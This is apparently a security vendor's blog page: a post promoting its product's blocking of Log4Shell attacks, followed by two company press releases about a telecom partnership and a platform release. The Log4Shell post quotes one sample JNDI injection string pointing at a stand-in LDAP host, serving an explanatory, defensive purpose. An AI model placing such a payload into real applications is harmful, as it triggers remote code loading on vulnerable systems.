Log4Shell: How Real-Time Threat Prevention saves Christmas Vacation

No Gravatar

The world woke up to a very nasty vulnerability last week with the word Log4Shell (CVE-2021-44228) painted all over the internet. This vulnerability allows attackers to execute dangerous files on compromised systems by injecting a very simple string like “${jndi:ldap://192.168.105.20:9999/a}” into any application running the popular Apache Log4j package.

Log4j is used to record performance and security information for running applications and have seen wide adoption in consumer and enterprise products and services. This vulnerability is also an overwhelming opportunity for hackers to compromise critical systems controlling pipelines and utilities along with newer smart infrastructure using sensors at unprotected endpoints to collect and transmit information to data servers.

In response to the emergence of these Log4Shell attacks companies have hardened their perimeter network protection and began urgently patching out this problem, putting an effective hold on any Christmas vacation and celebration.

Although the Intrusion Detection Prevention Systems used on these hardened networks were effective at blocking the initial unencrypted attacks, they are less effective when those attacks are carried over encrypted TLS traffic.

Many Wedge customers have reported seeing Log4Shell attacks, with some indicating that more than 60% of these blocked threats were Log4Shell daily intrusion attempts. Fortunately for our partners and customers, Real-Time Threat Prevention technology can detect and block CVE-2021-44228 on encrypted and unencrypted traffic in real time. Our threat prevention lab provided the following demonstration to show how this zero-day exploit could be blocked using WedgeARP:

Figure 1 – Log4Shell attack blocked on encrypted HTTPS traffic
Figure 2 – Log4Shell attack blocked by Wedge Networks’ IDS/IPS on unencrypted traffic

In first image, the Log4Shell exploit is being delivered over TCP using HTTPS. Originating from the source address (192.168.107.69), hackers target the destination address at a protected network. It is immediately detected and blocked by WedgeARP, preventing a cyber ransoming event.

In the second image, the Log4Shell exploit is being blocked over TCP using HTTP. Similarly, a hacker is sending the Log4Shell exploit from the source address (192.168.107.69) to target the destination address (192.168.106.36) where it is immediately blocked by WedgeARP.

With Real-Time Threat Prevention, hackers launching Log4Shell attacks over encrypted and unencrypted traffic will be prevented from accessing and ransoming confidential or personal data. 18 November 2021 – Smart City Expo and World Congress 2021 – BARCELONA, Spain: Chungwha Telecom (CHT), the largest telecommunications company in Taiwan, has formally entered into a Memorandum of Understanding (MOU) with Wedge Networks, the leader in real-time threat prevention.  Through this partnership, the two parties will join forces to co-develop a Zero-Trust Secure Edge Solution that will integrate Wedge’s Absolute Real-time Protection™ (WedgeARP™) platform with CHT’s EyeLAN software.  The combined solution will be offered on Wedge distributor, Edgecore Network’s uCPE hardware.  The resultant “Secure Edge” product will enable zero-trust authentication of devices, combined with real-time threat prevention, to any endpoint connecting to a network; offering enterprises the ability to run much more secure networking infrastructures within their organizations.

WedgeARP™ provides network-based, real-time threat protection for all types of endpoints in a wide range of networks (mobile data, 5G, SD-WAN, SASE, and smart-city/IIoT). With an embedded deep learning AI engine and patented real-time deep content inspection technology, WedgeARP™ can detect never-before-seen malware in milliseconds. Running on an orchestrated threat management platform, it is an effective and autonomous approach to enable large-scale real-time threat prevention.

CHT, using its EyeLAN network access control technology, is enabling Zero Trust networks by requiring all endpoints connecting to its secure networks to be properly authenticated before they can gain access.

“This MOU is important for us to develop a more effective and secure Zero Trust network solution for our global enterprise customers,” remarked Dr. Yu Huang Chu, CEO of EyeLAN Group in Chunghwa Telecom Lab. “By combining our very effective EyeLan authentication solution with active real-time threat prevention from WedgeARP™, to be distributed on an easy to deploy uCPE device from Edgecore, we can offer unparalleled security that our customers have been eagerly searching for.”

“Chunghwa Telecom is a key technology partners for Wedge in this venture and it shares our clear vision of innovative security and real-time threat prevention for the cloud connected world,” commented Dr. Hongwen Zhang, Wedge Networks, CEO & CTO. “The ability to enhance Zero Trust networks with real-time threat prevention will benefit customers and partners by better protecting their infrastructures from the exponential proliferation of malware cyber-attacks.”

CHT and Wedge have been working closely together to develop this innovative new Secure Edge security product and will each promote and sell the resulting offering to their diverse customers bases.

Wedge Networks Inc. Launches Managed Service Provider Release of its Wedge Absolute Real-time Protection Platform (Full Release)

WedgeARP Version 2.6 offers much-requested support for its award-winning Real-time Threat Prevention suite for Service Providers

16 November 2021 – Smart City Expo and World Congress 2021 – BARCELONA, Spain:  Wedge Networks Inc. (Wedge), a global leader in software defined Orchestrated Real-time Threat Prevention, is pleased to announce its upcoming Managed Service Provider Version of the latest WedgARP™ V2.6 release, which was designed to meet the demands of Managed Security Service Providers (MSSPs). This new release fulfills the feature requirements that MSPs have been demanding, including: 1. Service automation for self-management and provisioning, 2. Service application areas to encompass a variety of organizations (from Enterprises to Smart Cities and everything in-between) and catering to expanded service delivery models (supporting hybrid services such as on-premises enforcement and cloud managed to all-cloud enforced and managed), and 3. Secure “remote” manageability.

With WedgeARP v2.6, which now offers multi-tenancy and multi-zone management, additional Web Threat Intelligence, and Zero-Trust Secure Edge vCPE support, MSPs are provided with three key benefits:

1. Customers can now self-provision and self-manage the services that they require for their existing operational environments.
2. MSPs can access much more efficient resource utilization, which allows for both aggregation of services from a shared infrastructure as well as support for hybrid service delivery and users are now enabled with complete on-cloud service enforcement and management to more cost conscious on-premises enforcement and cloud management delivery; for those organizations where egress cost savings are required.
3. Secure remote manageability for the platform is provided through leading-edge, post-quantum safe VPN technology.

As with all Wedge solutions, support is provided for the new generation of networks; especially those powered by 5G / Edge deployments where latency requirements are aggressive (such as in the case of 5G self-driving and autonomous vehicles).

With these key new features, Managed Service Providers (MSPs) will be able to support their customers who may have multiple independent tenants working out of multiple zones and network segments.  For MSPs, this means that they can now enable and manage multi-dimensional environments and the myriad of orchestrated security services for tenants quickly and easily; and at reduced cost.

With the ability for customers to now self-manage the services that they want, this greatly lowers the overhead and management cost for MSPs and now allows them to quickly recruit a variety of new customers who can then pick and choose the services that they want and then manage them on their own.  With customers having many different types of networks and with many in growth mode, the new multi-tenancy and multi-zone features allows MSPs to quickly scale up and scale down these services as required.  As well, with many organizations operating as distributed enterprises, these new features introduce a whole new level of management efficiency, allowing Network / IT Teams to quickly add new tenants and zones as needed and manage the different security services that are required by each.

“We are very pleased and excited to announce the new functionalities that the Wedge Team have been working towards in this release.” said Dr. Hongwen Zhang, Wedge CEO & CTO and Co-Founder. “WedgeARP v2.6 is the intersection of three realities.  These are that: 1. Security must be provided in real-time, hence the need for real-time threat prevention, 2. Security should be delivered using MSPs, hence WedgeARP enabling MSPs to rapidly deploy real-time threat prevention to serve new customers, and 3. Services must be able to support the low latency requirements of the latest 5G networks.  While we have been providing real-time threat prevention and orchestrated security services through our WedgeARP™ platform, our MSP customers had been anxiously requesting multi-tenancy and multi-zone capabilities so that they could offer these services at a more granular level. This new MSP release of the WedgeARP™ now fulfills these functionalities.”

Wedge continues to form strategic partners with Managed Service Providers globally, with a focus on rapidly enabling real-time security as a service through these partners.  The many new features included in WedgeARP™ V 2.6 cater specifically to these MSP partners and will allow them to bring on new customers at an accelerated pace.  Enabling these partners to offer industry-best security services and adding a new dimension to their ease of deployment and management of these customers.
